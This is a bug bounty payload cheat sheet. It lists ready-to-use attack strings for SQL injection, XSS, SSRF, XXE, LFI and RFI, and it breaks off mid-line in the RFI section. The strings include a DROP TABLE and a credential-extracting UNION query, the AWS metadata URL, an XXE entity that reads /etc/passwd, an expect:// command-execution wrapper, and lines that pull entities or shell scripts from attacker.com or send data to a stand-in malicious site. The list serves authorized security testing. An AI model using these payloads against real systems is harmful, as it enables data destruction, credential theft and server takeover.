A curated collection of payloads and resources for various vulnerabilities encountered during bug bounty assessments.
SQL Injection allows attackers to interfere with the queries that an application makes to its database.
' OR '1'='1 – Basic authentication bypass.
1; DROP TABLE users -- – Attempt to drop a table.
' UNION SELECT username, password FROM users -- – Extract user credentials.
For a comprehensive list of SQLi payloads, refer to PayloadsAllTheThings - SQL Injection.
XSS allows attackers to inject malicious scripts into web pages viewed by other users.
<script>alert('XSS')</script> – Basic alert script.
"><script>alert('XSS')</script> – Breaking out of attributes.
<img src=x onerror=alert('XSS')> – Using image error event.
Explore more XSS payloads at PayloadsAllTheThings - XSS Injection.
SSRF vulnerabilities allow an attacker to induce the server-side application to make HTTP requests to an arbitrary domain.
http://localhost:22 – Access internal services.
http://169.254.169.254/latest/meta-data/ – AWS metadata endpoint.
http://your-malicious-site.com – Exfiltrate data to external server.
Detailed SSRF payloads can be found at PayloadsAllTheThings - SSRF.
XXE attacks exploit vulnerabilities in XML parsers to include external entities.
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<foo>&xxe;</foo><!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://attacker.com/evil.xml"> ]>
<foo>&xxe;</foo>Learn more about XXE payloads at PayloadsAllTheThings - XXE Injection.
LFI vulnerabilities allow an attacker to include files on a server through the web browser.
../../../../etc/passwd – Access sensitive system files.
php://filter/convert.base64-encode/resource=index.php – Encode file contents.
expect://ls – Execute commands (if expect wrapper is enabled).
Refer to PayloadsAllTheThings - File Inclusion for more LFI payloads.
RFI allows an attacker to include a remote file, usually through a script on the web server.
http://attacker.com/shell.txt – Include malicious scripts.
https://raw